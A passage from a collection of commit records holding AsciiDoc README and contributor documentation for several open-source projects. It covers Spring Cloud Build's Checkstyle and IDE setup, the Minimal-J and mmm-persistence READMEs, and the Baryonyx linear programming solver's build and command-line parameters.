it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle analyzes also the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppresions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to setup Intellij you should import our coding conventions, inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of Checkstyle rules\n<5> Project style conventions for Intellij that apply most of Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on the `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` to automatically convert the JUnit assertions\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml` : `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. you're working on `spring-cloud-contract`. Then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` folder. Example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n\n=== Duplicate Finder\n\nSpring Cloud Build brings along the `basepom:duplicate-finder-maven-plugin`, that enables flagging duplicate and conflicting classes and resources on the java classpath.\n\n==== Duplicate Finder configuration\n\nDuplicate finder is *enabled by default* and will run in the `verify` phase of your Maven build, but it will only take effect in your project if you add the `duplicate-finder-maven-plugin` to the `build` section of the projecst's `pom.xml`.\n\n.pom.xml\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\nFor other properties, we have set defaults as listed in the https:\/\/github.com\/basepom\/duplicate-finder-maven-plugin\/wiki[plugin documentation].\n\nYou can easily override them but setting the value of the selected property prefixed with `duplicate-finder-maven-plugin`. For example, set `duplicate-finder-maven-plugin.skip` to `true` in order to skip duplicates check in your build.\n\nIf you need to add `ignoredClassPatterns` or `ignoredResourcePatterns` to your setup, make sure to add them in the plugin configuration section of your project:\n\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <configuration>\n <ignoredClassPatterns>\n <ignoredClassPattern>org.joda.time.base.BaseDateTime<\/ignoredClassPattern>\n <ignoredClassPattern>.*module-info<\/ignoredClassPattern>\n <\/ignoredClassPatterns>\n <ignoredResourcePatterns>\n <ignoredResourcePattern>changelog.txt<\/ignoredResourcePattern>\n <\/ignoredResourcePatterns>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n<\/build>\n\n\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a20039e08d1656042d8554b4294a878aa50ef07","subject":"README.adoc: removed 'status' section. Doesn't help in any way","message":"README.adoc: removed 'status' section. Doesn't help in any way","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Minimal-J\n\nJava - but small.\n\nimage::doc\/frontends.png[]\n\nMinimal-J applications are\n\n* Responsive to use on every device\n* Straight forward to specify and implement and therefor\n* Easy to plan and manage\n\n=== Idea\n\nBusiness applications tend to get complex and complicated. Minimal-J prevents this by setting clear rules how an application should behave and how it should be implemented.\n\nMinimal applications may not always look the same. But the UI concepts never change. There are no surprises for the user.\n\n== Technical Features\n\n* Independed to the used UI technology. Implementations for Web \/ Mobile \/ Desktop.\n* ORM persistence layer for Maria DB or in memory DB. Transactions and Authorization supported.\n* Small: The minimalj.jar is still < 1MB\n* Very few dependencies\n* Applications run standalone or in a servlet container.\n\n== Documentation\n\n* link:doc\/user_guide.adoc[Minimal user guide] Good start point for user and programmer.\n* link:doc\/setup.adoc[Setup]\n* link:doc\/release_notes.adoc[Release Notes]\n\n=== Topics and examples\n\nThe small examples are currently deployed on CloudFoundry as online demo. Please note that some features are still incomplete in the html frontend.\n\n* link:example\/001_EmptyApplication\/doc\/001.adoc[Empty Application] The smallest application link:http:\/\/minimalj-examples.cfapps.io\/empty\/[(online demo)]\n* link:example\/002_HelloWorld\/doc\/002.adoc[Hello World] The hello world and the greeting application link:http:\/\/minimalj-examples.cfapps.io\/greeting\/[(online demo)]\n* link:example\/003_Notes\/doc\/003.adoc[Notes] This application manages some notes link:http:\/\/minimalj-examples.cfapps.io\/notes\/[(online demo)]\n* link:example\/004_Library\/doc\/004.adoc[Library] Shows some more features of the framework link:http:\/\/minimalj-examples.cfapps.io\/library\/[(online demo)]\n* link:example\/005_Numbers\/doc\/005.adoc[Numbers] How integers and BigDecimals are used\nlink:http:\/\/minimalj-examples.cfapps.io\/numbers\/[(online demo)]\n* link:example\/006_Persistence\/doc\/006.adoc[Persistence] Introduction to the O\/R mapping\n* link:example\/007_PetClinic\/doc\/007.adoc[PetClinic] Cover version of the Spring PetClinic application link:http:\/\/minimalj-examples.cfapps.io\/petClinic\/[(online demo)]\n* link:doc\/arch.adoc[Architecture] Explains the difference between client\/server and frontend\/backend\n* link:doc\/lists.adoc[Lists] How to use one to many relations in the data model\n* link:doc\/ui_content_and_components.adoc[UI details] Content, components and forms\n* link:doc\/authorization.adoc[Authorization] Security concepts and configuration\n\n=== Real application\n* https:\/\/github.com\/BrunoEberhard\/open-ech[Open-eCH]\n","old_contents":"= Minimal-J\n\nJava - but small.\n\nimage::doc\/frontends.png[]\n\nMinimal-J applications are\n\n* Responsive to use on every device\n* Straight forward to specify and implement and therefor\n* Easy to plan and manage\n\n=== Idea\n\nBusiness applications tend to get complex and complicated. Minimal-J prevents this by setting clear rules how an application should behave and how it should be implemented.\n\nMinimal applications may not always look the same. But the UI concepts never change. There are no surprises for the user.\n\n== Technical Features\n\n* Independed to the used UI technology. Implementations for Web \/ Mobile \/ Desktop.\n* ORM persistence layer for Maria DB or in memory DB. Transactions and Authorization supported.\n* Small: The minimalj.jar is still < 1MB\n* Very few dependencies\n* Applications run standalone or in a servlet container.\n\n== Status\n\nSometimes when I look at other frameworks I think Minimal-J is quite mature.\nBut at the moment it is still more of a personal research project. I still\nfeel free to change major points. There is no 1.0 version yet.\n\n== Documentation\n\nlink:doc\/user_guide.adoc[Minimal user guide] Good start point for user and programmer.\n\nlink:doc\/setup.adoc[Setup]\n\nlink:doc\/release_notes.adoc[Release Notes]\n\n=== Topics and examples\n\nThe small examples are currently deployed on CloudFoundry as online demo. Please note that some features are still incomplete in the html frontend.\n\n* link:example\/001_EmptyApplication\/doc\/001.adoc[Empty Application] The smallest application link:http:\/\/minimalj-examples.cfapps.io\/empty\/[(online demo)]\n* link:example\/002_HelloWorld\/doc\/002.adoc[Hello World] The hello world and the greeting application link:http:\/\/minimalj-examples.cfapps.io\/greeting\/[(online demo)]\n* link:example\/003_Notes\/doc\/003.adoc[Notes] This application manages some notes link:http:\/\/minimalj-examples.cfapps.io\/notes\/[(online demo)]\n* link:example\/004_Library\/doc\/004.adoc[Library] Shows some more features of the framework link:http:\/\/minimalj-examples.cfapps.io\/library\/[(online demo)]\n* link:example\/005_Numbers\/doc\/005.adoc[Numbers] How integers and BigDecimals are used\nlink:http:\/\/minimalj-examples.cfapps.io\/numbers\/[(online demo)]\n* link:example\/006_Persistence\/doc\/006.adoc[Persistence] Introduction to the O\/R mapping\n* link:example\/007_PetClinic\/doc\/007.adoc[PetClinic] Cover version of the Spring PetClinic application link:http:\/\/minimalj-examples.cfapps.io\/petClinic\/[(online demo)]\n* link:doc\/arch.adoc[Architecture] Explains the difference between client\/server and frontend\/backend\n* link:doc\/lists.adoc[Lists] How to use one to many relations in the data model\n* link:doc\/ui_content_and_components.adoc[UI details] Content, components and forms\n* link:doc\/authorization.adoc[Authorization] Security concepts and configuration\n\n=== Real application\n* https:\/\/github.com\/BrunoEberhard\/open-ech[Open-eCH]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c580896805165b18fa4a45d899ef452a005b2889","subject":"README improved","message":"README improved\n","repos":"m-m-m\/persistence","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Mature Modular Meta-framework (mmm)\n\nimage:https:\/\/raw.github.com\/m-m-m\/mmm\/master\/src\/site\/resources\/images\/logo.png[logo]\n\n*Welcome to the wonderful world of http:\/\/m-m-m.sourceforge.net\/index.html[mmm]*\n\n== mmm-persistence\n\nPersistence infrastructure for DAOs based on JPA\n\n=== Deprecated\nThis project is discontinued and not supported anymore.\nPlease consider using http:\/\/projects.spring.io\/spring-data-jpa\/[spring-data-jpa] or https:\/\/github.com\/oasp\/oasp4j\/tree\/develop\/modules\/jpa[oasp4j-module-jpa] instead.","old_contents":"= mmm-persistence\nPersistence infrastructure for DAOs based on JPA\n\n== Deprecated\nThis project is discontinued and not supported anymore.\nPlease consider using http:\/\/projects.spring.io\/spring-data-jpa\/[spring-data-jpa] or https:\/\/github.com\/oasp\/oasp4j\/tree\/develop\/modules\/jpa[oasp4j-module-jpa] instead.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6489f9b7dda9f992085c161dfd5aa41f5a90bfe","subject":"README: update with new parameters","message":"README: update with new parameters\n","repos":"quesnel\/baryonyx,quesnel\/baryonyx,quesnel\/baryonyx","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Baryonyx\nGauthier Quesnel <gauthier.quesnel@inra.fr>\nv0.5.x, 2020-01-??\n:toc:\n:homepage: https:\/\/github.com\/quesnel\/baryonyx\/\n\nhttps:\/\/en.wikipedia.org\/wiki\/Baryonyx[Baryonyx] is an integer and binary linear\nprogramming solver based on the http:\/\/www.cse.chalmers.se\/~dag\/[Dag Wedelin]\nheuristic.\n\n[width=\"15%\"]\n|============\n| https:\/\/travis-ci.org\/quesnel\/baryonyx[image:https:\/\/travis-ci.org\/quesnel\/baryonyx.png?branch=master[Build Status]] | https:\/\/ci.appveyor.com\/project\/quesnel\/baryonyx?branch=master[image:https:\/\/ci.appveyor.com\/api\/projects\/status\/github\/quesnel\/baryonyx?branch=master&svg=true[Build Status]]\n|============\n\nCopyright \u00a9 2017-2019 http:\/\/www.inra.fr\/en[INRA]\n\nThe software is released under the MIT license. See the LICENSE file.\n\n== Baryonyx\n\n=== Requirements and recommended\n\n* `cmake` (\u2265 3.11)\n* $$C++$$ compiler with $$C++17$$ support:\n** `gcc` \u2265 7 (https:\/\/www.gnu.org\/software\/gcc\/projects\/cxx-status.html[notes])\n** `clang` \u2265 5 (https:\/\/clang.llvm.org\/cxx_status.html[notes])\n** `visual studio 2017 15.9` with the latest patchs of 2018 (https:\/\/docs.microsoft.com\/en-us\/visualstudio\/releasenotes\/vs2017-relnotes[notes])\n\nFor recent Debian GNU\/Linux and Ubuntu derivatives (remove clang to\nonly use gcc):\n\n[source,bash]\n....\napt-get install build-essential cmake clang\n....\n\nFor Windows, install the https:\/\/www.cmake.org[CMake program] and\nVisual Studio 2017 (MSVC). You may also install the vcpkg program to\ninstall nlopt and other dependencies.\n\n* `nlopt` library - optimization library to automatic parametrization\n of the Baryonyx solver parameters.\n\n=== First installation\n\nFirst, we clone Baryonyx git repository and the submodule.\n\n....\ngit clone https:\/\/github.com\/quesnel\/baryonyx.git\ncd baryonyx\ngit submodule update --init --recursive\n....\n\nDefault, Baryonyx provides a shared library `libbaryonyx-0.5.so` (with\nhidden symbol), a static library `libbaryonyx-0.5.a` (all symbols are\npublic) and an executable `baryonyx-0.5`. To compile and install in\nthe default CMake install directory:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\nPrevious command line install Baryonyx program and library into the\n`\/usr\/local` prefix. If you install into another directory, you need\nto define three environment variables (into your `.bashrc` or\nequivalent). If you install into `$HOME\/usr` for example, you need to\ndefine in your `.bashrc`:\n\n....\nexport PATH=$PATH:$HOME\/usr\/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$HOME\/usr\/lib\nexport PKG_CONFIG_PATH=$PKG_CONFIX_PATH:$HOME\/usr\/lib\/pkgconfig\n....\n\nThen run the following commands:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\nmake install\n....\n\nTo override the default build flags, remove the `CMAKE_BUILD_TYPE`\nparameter and override the `CXXFLAGS` as follow:\n\n....\nexport CXX=g++-8\nexport CXXFLAGS='-Wall -Wextra -Werror -ftree-vectorize -mmmx -msse -msse2 -msse3 -O3'\ncmake -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\n....\n\nThe CMake script provide parameters to control debug, log facility and\noptimization.\n\n.Table CMake Command line parameters (cmake -DWITH_LOG=OFF ...)\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| default| summary\n\n| WITH_LOG\n| ON\n| Enable log message on standard output.\n\n| WITH_DEBUG\n| ON\n| Enable maximum debug function and add more log message. Be careful, this mode slow down computation.\n\n| WITH_FULL_OPTIMIZATION\n| OFF\n| Enable optimal computation but remove some control on float and control.\n|===\n\n=== Update installation\n\nFirst, we need to update the Git repository with the following\ncommands:\n\n....\ncd baryonyx\ngit pull -r\ngit submodule update --recursive\n....\n\nThen go to the build directory and restart compilation and\ninstallation :\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\n== Usage\n\n=== Solver & Optimizer\n\nTo run Baryonyx in solver mode (i.e. trying to valid all constraints):\n\n....\nbaryonyx-0.5 file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.5 -o file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.5 -o file.lp\n....\n\nThe Baryonyx solver have many parameters. Some parameters are global,\nsome specific for the optimization algorithms.\n\n.Table Command line global parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| --help -h\n|\n| Show help message\n\n| --quiet -q\n|\n| Remove many console output\n\n| --bench [name]\n|\n| Start benchmark. Need csv input files\n\n| --optimize -O\n|\n| Start Baryonyx in optimization mode, default is to use the solve mode\n\n| --limit -l -plimit\n| integer\n| number of loop to stop algorithm\n\n| --verbose -v\n| integer\n| verbose level from 0 (very very verbose in debug mode) to 7 (quiet)\n\n| --disable-preprocessing -np\n|\n| disable the use of preprocessing\n\n| --random\n|\n| use the pure random solver (for benchmark) instead of the Bastert\/Wedelin algorithm.\n\n| --auto[:= ]value\n| string\n| Select the type of optimizer meta-heuristic. Values are:\n\n* `none` without specific algorithm.\n* `manual` tries to update parameters to found best solution.\n* `nlopt` tries to update parameters to found best solution using nlopt library and the Nelder Mead algorithm.\n* `branch` split recursively original problem to found best solution.\n* `branch-manual` mix branch and manual algorithm.\n* `branch-nlopt` mix branch and nlopt algorithm.\n\n|===\n\nTo assign parameters to solver or optimizer algorithms, use the `-p\n[name]:value` syntax in the command line:\n\n.Table Command line parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| time-limit\n| real\n| time in second to stop algorithm or stop the optimize mode\n\n| limit\n| integer\n| number of loop to stop algorithm\n\n| w\n| double\n| warmup-iterator [0, 1] A percentage of `limit` loop and if w is greater than 1, the number of loop without updating kappa\n\n| theta\n| real\n| history parameters [0, 1[\n\n| delta\n| real\n| influence parameters [0, +oo[\n\n| kappa-min\n| real\n| kappa minimal value [0, kappa-max\n\n| kappa-step\n| real\n| kappa updater [0, +oo[\n\n| kappa-max\n| real\n| kappa maximal value ]kappa-min, +oo[ to stop algorithm\n\n| alpha\n| real\n| adaptiveness parameter\n\n| pushing-k-factor\n| integer\n| use to lower the kappa using the push system\n\n| pushes-limit\n| integer\n| number of push before stopping the algorithm\n\n| pushing-objective-amplifier\n| real\n| use to make r more similar to costs\n\n| pushing-iteration-limit\n| integer\n| number of loop before trying a new push\n\n| norm\n| string\n| Select the cost normalization function\n\n* `none` let unmodified costs\n* `l1` use the l1-norm function\n* `l2` use the l2-norm function\n* `random` try to avoid equal cost\n* `inf` (default): use the infinity norm\n\n| constraint-order\n| string\n| Remaining constraints order. Values are:\n\n* `none` (default): use the lp format constraint order\n* `reversing`: reverse the lp format constraint order\n* `random-sorting`: random the remaining constraint list\n* `infeasibility-decr`: compute infeasibility constraint in decremental order\n* `infeasibility-incr`: compute infeasibility constraint in incremental order\n* `lagrangian-decr`: sort violated constraints according to the Lagrangian multiplier values in decremental order\n* `lagrangian-incr`: sort violated constraints according to the Lagrangian multiplier values in incremental order\n* `pi-sign-change`: random the remaining constraint list if the lagrangian multipliers signs have changed\n* `cycle`: switch the constraint order after each `update_row`. Starts from `none` to `pi-sign-change`.\n\n| preprocessing\n| string\n| Constraints matrix A order. Values are:\n\n* `none`: Use the raw_problem (or lp file) order for constraints and variables.\n* `memory`: Default, use the raw_problem (or lp file) order for constraints but sort the variables to improve the memory cache efficiency.\n* `less_greater_equal`: sort constraints according to their type (first less and finally greater then equal) and sort variable to improve the memory cache efficiency.\n* `less_equal_greater`: sort constraints according to their type (first less\n and finally equal then greater) and sort variable to improve the memory cache\n efficiency.\n* `greater_less_equal`: sort constraints according to their type (first greater\n then less and finally equal) and sort variable to improve the memory cache\n efficiency.\n* `greater_equal_less`: sort constraints according to their type (first greater\n then equal and finally less) and sort variable to improve the memory cache\n efficiency.\n* `equal_less_greater`: sort constraints according to their type (first equal\n then less and finally greater) and sort variable to improve the memory cache\n efficiency.\n* `equal_greater_less`: sort constraints according to their type (first equal\n then greater and finally less) and sort variable to improve the memory cache\n efficiency.\n* `p1`: reserved\n* `p2`: reserved\n* `p3`: reserved\n* `p4`: reserved\n\n| observation\n| string\n| Select the type of observation mechanism (only in solve mode)\n\n* `none` no observation (default).\n* `pnm` produce picture files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n* `file` produce CSV files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n\n| floating-point_type\n| string\n| Select the type of real use internally in the solvers. Values are:\n\n* `float` float (32 bits)\n* `double` double (64 bits)\n* `longdouble` long double (84 or 128 bits)\n\n| print-level\n| integer\n| show information if greater than 0\n\n| init-policy (solver only)\n| string\n| Change the initialization and reinitialization policy of the solution vector. Values are:\n\n* `bastert`: for each variable (or at `init-policy-random` rate) use cost\n values to set or unset variable.\n* `pessimistic-solve`: found a solution for each (or at `init-policy-random`\n rate) constraints. For soft constraints, affect one to strict minimum\n variables.\n* `optimistic-solve`: found a solution for each (or or `init-policy-random`\n rate) constraints. For soft constraints, affect one to the maximum variables\n that valid the constraint.\n\n| init-policy-random (solver only)\n| real\n| [0-1] (default, 0.5) parameter of the bernoulli's law to be used in\n conjunction with the `init-policy` parameter. If the law returns 1, it\n uses the `init-policy` algorithm to initialize `X_i`, 0 means use a toss\n up to choose 0 or 1 according to the `init-random` value.\n\n| init-crossover-bastert-insertion (optimizer only)\n| real\n| [0-1] Probability to insert a bastert solution during the crossover\n operation.\n\n| init-crossover-solution-selection-mean (optimizer only)\n| real\n| [0-1] Probability to select a solution to do the crossover operation. This\n parameter allows the selection of solution in the population. 0 means best\n solution, 1 means the worst in mean.\n\n| init-crossover-solution-selection-stddev (optimizer only)\n| real\n| [0-1] Probability to select a solution to do the crossover operation. This\n parameter allows the selection of solution in the population. The standard\n deviation for the normal probability law.\n\n| init-mutation-variable-mean (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the number of variables to change. The mean for the normal\n probability law.\n\n| init-mutation-variable-stddev (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the number of variables to change. The standard deviatation\n for the normal probability law.\n\n| init-mutation-value-mean (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the value of the variable. The mean for the normal\n probability law.\n\n| init-mutation-value-stddev (optimizer only)\n| real\n| [0-1] Probability to mutate the solution after the crossover operation. This\n parameter defines the value of the variable. The standard deviation for the\n normal probability law.\n\n| storage-type\n| string\n| Change the solution storage policy for the optimizer mode.\n\n* `one` (default): stores only the best solution found.\n* `bound`: stores the best and the bad solution found.\n* `five`: stores the best five solution found.\n\n|===\n\nFor example:\n\n....\nbaryonyx -p limit:1000000 lib\/test\/prevl1.lp\nbaryonyx -p limit:-1 -p kappa-min:0.2 lib\/test\/prevl1.lp\n....\n\n=== Benchmark\n\nBaryonyx permits to run benchmark on a set of problems described in a `csv`\nfiles. This option is available using the `--bench [name]` option and `csv`\nfiles. All Baryonyx parameters are available to perform the benchmark.\n\nFor example:\n\n....\nbaryonyx --bench bx-0.5 -pdelta:0.01 -ptime-limit:60 spp.csv\n....\n\nThe benchmark mode updates the `csv` file with results of computation. The\n`csv` format is:\n\n....\nfile optimum status cplex lsp bx-0.2 <1>\ncplex:\nlsp: <2>\nbx-0.2:\nscp410 optimum 514 514 514 804 <3>\nscp41 optimum 429 429 429 627\nscp42 optimum 512 512 512 934\n....\n\n<1> The header: three columns mandatory (`file`, `optimum`, `status`) and one\nsolver per column. In this example, cplex, local solver and baryonyx 0.2.\n<2> The description part: one line per solver to describe version and parameter\nfor example.\n<3> Finally, one line per solve: model name (with or without extension), status\n(optimum\/feasible), best solution found and solver's solution. `inf` can be use\nto indicate no solution found.\n\nIn benchmark directory, some files are provided and a script to download\nclassical problem.\n\n== R\n\nTo use rbaryonyx, you must compile and install the baryonyx library.\nFollow the previous section and install R.\n\n=== Installation\n\nThe R rbaryonyx package requires several packages. Then, under a R terminal:\n\n....\ncd baryonyx\/rbaryonyx\nR CMD REMOVE rbaryonyx <1>\n\ninstall.packages(\"roxygen2\") <2>\ninstall.packages(\"Rcpp\")\ninstall.packages(\"devtools\")\n\nlibrary(Rcpp) <3>\ncompileAttributes(\".\")\nlibrary(devtools)\ndevtools::document()\ndevtools::build()\ndevtools::install()\n\nlibrary(rbaryonyx) <4>\n?rbaryonyx <5>\n....\n\n<1> Remove previous installed version of rbaryonyx\n<2> Install the dependencies of rbaryonyx\n<3> Build the rbaryonyx package\n<4> Load the package\n<5> The help\n\n=== API\n\nTwo functions are provided to solve or optimize 01 linear programming\nproblem. Parameters are the same as `C++ API`. These function returns a\nscalar:\n\n* If a solution is found:\n** if the problem is a minimization: the value of the solution found.\n** if the problem is a maximization: the inverse of the solution found.\n* If no solution is found, we use the limits of the objective function (minimal\n and maximal value possible.\n** if the problem is a minimization: the maximal value possible + the remaining\n constraints.\n** if the problem is a maximization: the inverse of the minimal value possible\n + the remaining constraints.\n* If a error occurred (not enough memory, problem error etc.):\n** if the problem is a minimization: the maximal value possible + the number of\n constraints .\n** if the problem is a maximization: the inverse of the minimal value possible\n + the number of constraints.\n\n[source,R]\n----\nsolve_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, 